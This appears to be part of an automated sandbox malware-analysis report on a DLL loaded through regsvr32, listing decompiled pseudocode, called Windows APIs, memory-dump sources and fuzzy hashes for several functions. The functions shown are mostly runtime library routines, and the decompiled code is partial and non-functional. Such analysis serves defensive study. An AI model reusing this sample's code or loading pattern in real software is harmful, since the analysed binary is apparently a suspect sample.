				if (E00000001180004314(_t235, _t237, _t237, _t313, _t281) != 0) goto 0x80003784;
				E00000001180002068(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
				_t177 =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) = _t177;
				_t178 = _t177 | 0xffffffff;
				 *((long long*)(_t284 + 0x48)) = _t281;
				 *(_t284 + 0x40) = _t313;
				 *(_t284 + 0x38) = _t178;
				 *(_t284 + 0x30) = _t178;
				 *(_t284 + 0x28) = _t280;
				 *(_t284 + 0x20) = _t313;
				E00000001180002274( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
				goto 0x80003784;
				if (_t280[3] <= 0) goto 0x80003784;
				if ( *((char*)(_t282 + 0x98)) != 0) goto 0x800037f7;
				 *(_t284 + 0x38) = _t307;
				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
				 *(_t284 + 0x28) = r14d;
				 *(_t284 + 0x20) = _t280;
				E00000001180003800(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
				_t173 = E00000001180002D40(_t235);
				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0x800037f7;
				return E000000011800010B0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
			}

































                                                                                                                                                                                                            0x180003328
                                                                                                                                                                                                            0x180003335
                                                                                                                                                                                                            0x18000333a
                                                                                                                                                                                                            0x180003341
                                                                                                                                                                                                            0x180003348
                                                                                                                                                                                                            0x18000334b
                                                                                                                                                                                                            0x18000334f
                                                                                                                                                                                                            0x180003359
                                                                                                                                                                                                            0x180003363
                                                                                                                                                                                                            0x180003368
                                                                                                                                                                                                            0x18000336b
                                                                                                                                                                                                            0x180003376
                                                                                                                                                                                                            0x18000337d
                                                                                                                                                                                                            0x180003382
                                                                                                                                                                                                            0x180003385
                                                                                                                                                                                                            0x18000338a
                                                                                                                                                                                                            0x180003390
                                                                                                                                                                                                            0x180003399
                                                                                                                                                                                                            0x1800033a5
                                                                                                                                                                                                            0x1800033af
                                                                                                                                                                                                            0x1800033c0
                                                                                                                                                                                                            0x1800033cb
                                                                                                                                                                                                            0x1800033d1
                                                                                                                                                                                                            0x1800033db
                                                                                                                                                                                                            0x1800033e1
                                                                                                                                                                                                            0x1800033e6
                                                                                                                                                                                                            0x1800033ea
                                                                                                                                                                                                            0x1800033f3
                                                                                                                                                                                                            0x1800033fc
                                                                                                                                                                                                            0x180003401
                                                                                                                                                                                                            0x18000340c
                                                                                                                                                                                                            0x180003412
                                                                                                                                                                                                            0x18000341f
                                                                                                                                                                                                            0x180003426
                                                                                                                                                                                                            0x18000342c
                                                                                                                                                                                                            0x180003436
                                                                                                                                                                                                            0x180003438
                                                                                                                                                                                                            0x180003441
                                                                                                                                                                                                            0x18000344c
                                                                                                                                                                                                            0x180003458
                                                                                                                                                                                                            0x180003464
                                                                                                                                                                                                            0x18000346a
                                                                                                                                                                                                            0x180003478
                                                                                                                                                                                                            0x18000347c
                                                                                                                                                                                                            0x180003486
                                                                                                                                                                                                            0x180003490
                                                                                                                                                                                                            0x1800034a1
                                                                                                                                                                                                            0x1800034a7
                                                                                                                                                                                                            0x1800034ae
                                                                                                                                                                                                            0x1800034be
                                                                                                                                                                                                            0x1800034c9
                                                                                                                                                                                                            0x1800034ce
                                                                                                                                                                                                            0x1800034d1
                                                                                                                                                                                                            0x1800034d6
                                                                                                                                                                                                            0x1800034da
                                                                                                                                                                                                            0x1800034df
                                                                                                                                                                                                            0x1800034e4
                                                                                                                                                                                                            0x1800034eb
                                                                                                                                                                                                            0x1800034f1
                                                                                                                                                                                                            0x1800034f5
                                                                                                                                                                                                            0x1800034f9
                                                                                                                                                                                                            0x180003508
                                                                                                                                                                                                            0x180003517
                                                                                                                                                                                                            0x180003521
                                                                                                                                                                                                            0x180003524
                                                                                                                                                                                                            0x180003528
                                                                                                                                                                                                            0x18000352f
                                                                                                                                                                                                            0x180003539
                                                                                                                                                                                                            0x180003540
                                                                                                                                                                                                            0x180003546
                                                                                                                                                                                                            0x18000354c
                                                                                                                                                                                                            0x180003554
                                                                                                                                                                                                            0x180003558
                                                                                                                                                                                                            0x18000355f
                                                                                                                                                                                                            0x180003568
                                                                                                                                                                                                            0x18000356c
                                                                                                                                                                                                            0x180003570
                                                                                                                                                                                                            0x180003574
                                                                                                                                                                                                            0x180003578
                                                                                                                                                                                                            0x18000357b
                                                                                                                                                                                                            0x18000358c
                                                                                                                                                                                                            0x18000358f
                                                                                                                                                                                                            0x180003594
                                                                                                                                                                                                            0x1800035a1
                                                                                                                                                                                                            0x1800035a4
                                                                                                                                                                                                            0x1800035aa
                                                                                                                                                                                                            0x1800035ac
                                                                                                                                                                                                            0x1800035c7
                                                                                                                                                                                                            0x1800035d2
                                                                                                                                                                                                            0x1800035d8
                                                                                                                                                                                                            0x1800035de
                                                                                                                                                                                                            0x1800035e0
                                                                                                                                                                                                            0x1800035e6
                                                                                                                                                                                                            0x1800035e8
                                                                                                                                                                                                            0x1800035ee
                                                                                                                                                                                                            0x1800035f4
                                                                                                                                                                                                            0x180003612
                                                                                                                                                                                                            0x18000361a
                                                                                                                                                                                                            0x180003622
                                                                                                                                                                                                            0x18000362d
                                                                                                                                                                                                            0x180003635
                                                                                                                                                                                                            0x18000363e
                                                                                                                                                                                                            0x180003647
                                                                                                                                                                                                            0x18000364c
                                                                                                                                                                                                            0x180003651
                                                                                                                                                                                                            0x180003656
                                                                                                                                                                                                            0x18000365d
                                                                                                                                                                                                            0x180003668
                                                                                                                                                                                                            0x18000366b
                                                                                                                                                                                                            0x180003672
                                                                                                                                                                                                            0x180003684
                                                                                                                                                                                                            0x18000368a
                                                                                                                                                                                                            0x18000368e
                                                                                                                                                                                                            0x180003690
                                                                                                                                                                                                            0x18000369c
                                                                                                                                                                                                            0x1800036a6
                                                                                                                                                                                                            0x1800036b9
                                                                                                                                                                                                            0x1800036c7
                                                                                                                                                                                                            0x1800036d1
                                                                                                                                                                                                            0x1800036d3
                                                                                                                                                                                                            0x1800036db
                                                                                                                                                                                                            0x1800036e2
                                                                                                                                                                                                            0x1800036f1
                                                                                                                                                                                                            0x180003704
                                                                                                                                                                                                            0x180003709
                                                                                                                                                                                                            0x18000371a
                                                                                                                                                                                                            0x18000371e
                                                                                                                                                                                                            0x180003721
                                                                                                                                                                                                            0x180003726
                                                                                                                                                                                                            0x18000372b
                                                                                                                                                                                                            0x18000372f
                                                                                                                                                                                                            0x180003736
                                                                                                                                                                                                            0x18000373b
                                                                                                                                                                                                            0x180003740
                                                                                                                                                                                                            0x180003745
                                                                                                                                                                                                            0x18000374b
                                                                                                                                                                                                            0x180003754
                                                                                                                                                                                                            0x180003763
                                                                                                                                                                                                            0x18000376b
                                                                                                                                                                                                            0x180003772
                                                                                                                                                                                                            0x18000377a
                                                                                                                                                                                                            0x18000377f
                                                                                                                                                                                                            0x180003784
                                                                                                                                                                                                            0x18000378e
                                                                                                                                                                                                            0x1800037af

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                            • Opcode ID: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                                                                                                                                            • Instruction ID: 68369fba8b053f101f7a0a57f2a328d7db6ec17b1fffbc4fe0a5b608d0144455
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0E1B272604B888AEBA6DF66D4423DD77A4F749BC8F008116FE8957B96CF34D698C700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000000018000A3DC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                            			E0000000118000A3DC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t35;
				signed long long _t56;
				intOrPtr _t60;
				void* _t71;
				signed long long _t72;
				long long _t78;
				void* _t82;
				signed long long _t88;
				signed long long _t89;
				signed long long _t90;
				WCHAR* _t91;
				long _t94;
				void* _t97;
				WCHAR* _t102;

				 *((long long*)(_t82 + 8)) = __rbx;
				 *((long long*)(_t82 + 0x10)) = _t78;
				 *((long long*)(_t82 + 0x18)) = __rsi;
				r15d = __ecx;
				_t72 = _t71 | 0xffffffff;
				_t89 =  *0x80021010; // 0xc23e8d4af72c
				_t88 =  *(0x180000000 + 0x226f0 + _t102 * 8) ^ _t89;
				asm("dec ecx");
				if (_t88 == _t72) goto 0x8000a51f;
				if (_t88 == 0) goto 0x8000a441;
				_t56 = _t88;
				goto 0x8000a521;
				if (__r8 == __r9) goto 0x8000a504;
				_t60 =  *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8));
				if (_t60 == 0) goto 0x8000a469;
				if (_t60 != _t72) goto 0x8000a55e;
				goto 0x8000a4f0;
				r8d = 0x800;
				LoadLibraryExW(_t102, _t97, _t94);
				if (_t56 != 0) goto 0x8000a53e;
				if (GetLastError() != 0x57) goto 0x8000a4de;
				_t14 = _t56 - 0x50; // -80
				_t35 = _t14;
				r8d = _t35;
				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
				r8d = _t35;
				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
				r8d = 0;
				LoadLibraryExW(_t91, _t71);
				if (_t56 != 0) goto 0x8000a53e;
				 *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8)) = _t72;
				if (__r8 + 4 != __r9) goto 0x8000a44a;
				_t90 =  *0x80021010; // 0xc23e8d4af72c
				asm("dec eax");
				 *(0x180000000 + 0x226f0 + _t102 * 8) = _t72 ^ _t90;
				return 0;
			}

















                                                                                                                                                                                                            0x18000a3dc
                                                                                                                                                                                                            0x18000a3e1
                                                                                                                                                                                                            0x18000a3e6
                                                                                                                                                                                                            0x18000a3f8
                                                                                                                                                                                                            0x18000a402
                                                                                                                                                                                                            0x18000a418
                                                                                                                                                                                                            0x18000a41f
                                                                                                                                                                                                            0x18000a428
                                                                                                                                                                                                            0x18000a42e
                                                                                                                                                                                                            0x18000a437
                                                                                                                                                                                                            0x18000a439
                                                                                                                                                                                                            0x18000a43c
                                                                                                                                                                                                            0x18000a444
                                                                                                                                                                                                            0x18000a44d
                                                                                                                                                                                                            0x18000a459
                                                                                                                                                                                                            0x18000a45e
                                                                                                                                                                                                            0x18000a464
                                                                                                                                                                                                            0x18000a476
                                                                                                                                                                                                            0x18000a47c
                                                                                                                                                                                                            0x18000a488
                                                                                                                                                                                                            0x18000a497
                                                                                                                                                                                                            0x18000a499
                                                                                                                                                                                                            0x18000a499
                                                                                                                                                                                                            0x18000a49f
                                                                                                                                                                                                            0x18000a4b0
                                                                                                                                                                                                            0x18000a4b2
                                                                                                                                                                                                            0x18000a4c6
                                                                                                                                                                                                            0x18000a4c8
                                                                                                                                                                                                            0x18000a4d0
                                                                                                                                                                                                            0x18000a4dc
                                                                                                                                                                                                            0x18000a4e8
                                                                                                                                                                                                            0x18000a4f7
                                                                                                                                                                                                            0x18000a4fd
                                                                                                                                                                                                            0x18000a511
                                                                                                                                                                                                            0x18000a517
                                                                                                                                                                                                            0x18000a53d

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                            • Opcode ID: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                                                                                                                            • Instruction ID: 4cb29e05f73c92bcfdeebd25cdbb701ff5eb44b215489781f60aaecc25d2491e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED41D032715A0856FBA7CB16AC047D53391B78EBE0F09C225BD1D47798EE38C64D8300
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00000001800045BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                            			E000000011800045BC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				struct HINSTANCE__* _t81;
				long long _t85;
				void* _t89;
				struct HINSTANCE__* _t94;
				long _t97;
				void* _t100;
				signed long long _t101;
				WCHAR* _t104;

				 *((long long*)(_t89 + 8)) = __rbx;
				 *((long long*)(_t89 + 0x10)) = _t85;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t101 = _t100 | 0xffffffff;
				_t61 =  *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8));
				if (_t61 == _t101) goto 0x800046eb;
				if (_t61 != 0) goto 0x800046ed;
				if (__r8 == __r9) goto 0x800046e3;
				_t67 =  *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8));
				if (_t67 == 0) goto 0x8000462e;
				if (_t67 != _t101) goto 0x800046c5;
				goto 0x80004699;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t100, _t97);
				_t68 = _t61;
				if (_t61 != 0) goto 0x800046a5;
				if (GetLastError() != 0x57) goto 0x80004687;
				_t14 = _t68 + 7; // 0x7
				r8d = _t14;
				if (E00000001180007070(__r8) == 0) goto 0x80004687;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t61 != 0) goto 0x800046a5;
				 *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8)) = _t101;
				goto 0x8000460c;
				_t21 = 0x180000000 + 0x221f0 + __rsi * 8;
				_t65 =  *_t21;
				 *_t21 = _t61;
				if (_t65 == 0) goto 0x800046c5;
				FreeLibrary(_t94);
				GetProcAddress(_t81);
				if (_t65 == 0) goto 0x800046e3;
				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t65;
				goto 0x800046ed;
				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t101;
				return 0;
			}















                                                                                                                                                                                                            0x1800045bc
                                                                                                                                                                                                            0x1800045c1
                                                                                                                                                                                                            0x1800045c6
                                                                                                                                                                                                            0x1800045e1
                                                                                                                                                                                                            0x1800045ee
                                                                                                                                                                                                            0x1800045fa
                                                                                                                                                                                                            0x180004603
                                                                                                                                                                                                            0x18000460c
                                                                                                                                                                                                            0x180004615
                                                                                                                                                                                                            0x180004621
                                                                                                                                                                                                            0x180004626
                                                                                                                                                                                                            0x18000462c
                                                                                                                                                                                                            0x18000463b
                                                                                                                                                                                                            0x180004641
                                                                                                                                                                                                            0x180004647
                                                                                                                                                                                                            0x18000464d
                                                                                                                                                                                                            0x180004658
                                                                                                                                                                                                            0x18000465a
                                                                                                                                                                                                            0x18000465a
                                                                                                                                                                                                            0x18000466f
                                                                                                                                                                                                            0x180004671
                                                                                                                                                                                                            0x180004679
                                                                                                                                                                                                            0x180004685
                                                                                                                                                                                                            0x180004691
                                                                                                                                                                                                            0x1800046a0
                                                                                                                                                                                                            0x1800046af
                                                                                                                                                                                                            0x1800046af
                                                                                                                                                                                                            0x1800046af
                                                                                                                                                                                                            0x1800046ba
                                                                                                                                                                                                            0x1800046bf
                                                                                                                                                                                                            0x1800046cb
                                                                                                                                                                                                            0x1800046d4
                                                                                                                                                                                                            0x1800046d9
                                                                                                                                                                                                            0x1800046e1
                                                                                                                                                                                                            0x1800046e3
                                                                                                                                                                                                            0x180004709

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004641
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 000000018000464F
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004679
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046BF
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046CB
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                            • Opcode ID: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                                                                                                                            • Instruction ID: a281eee05f5572a15ea3fe0403c4f12dabc44bbec878773a6143b276462e3048
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F31F276302B48A1EE93DB02A8007D533E4B70DBE4F598625BE2D0B3A0EF39C24C8705
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180007DB8 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                            • Opcode ID: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                                                                                                                            • Instruction ID: c3c6b15d1e2a8e36adeeaa1ee2c0ab8803bf36c1bad1bc725f34006b2089cb00
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5214F3470668C42FAE7E73195553ED72926B6C7F0F58C624B83A07BDBDE6C8A494700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000000018000F374 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                            • Opcode ID: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                                                                                                                            • Instruction ID: 0de398e34c1669cec19602a54f8a011ae7faefe96049ea3591aa14d2bab58b4a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F115B31610F4886E7939B52F85439A73A0F79CBE4F048225FA5E87BA4CF78CA488740
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180007F30 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0000C23E8D4AF72C,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F3F
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,0000C23E8D4AF72C,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F75
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,0000C23E8D4AF72C,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FA2
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,0000C23E8D4AF72C,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FB3
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,0000C23E8D4AF72C,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FC4
                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,0000C23E8D4AF72C,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FDF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                            • Opcode ID: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                                                                                                                            • Instruction ID: b3640c739d53f521f3aff5ec24f9b4829142f54ff52cb57a8f227eaee239dcc8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72115C3070964942FAEBE32195453F972926B9C7F0F18C625B83A077DBDE68C6498701
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180014C90 Relevance: 9.0, APIs: 6, Instructions: 45windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LoadMessage$StringTranslate$AcceleratorClassCreateCursorDispatchRegisterWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1967609040-0
                                                                                                                                                                                                            • Opcode ID: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                                                                                                                            • Instruction ID: 677205889e0bc738131920ca4d71d6e0d0c6d5bcb4ac294ec7d30bf60c9b59c6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8611B932614E89D2E7A2DB61F8517DA7361F7D8784F508121FA8947A79DF3CC7198B00
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180003B5C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
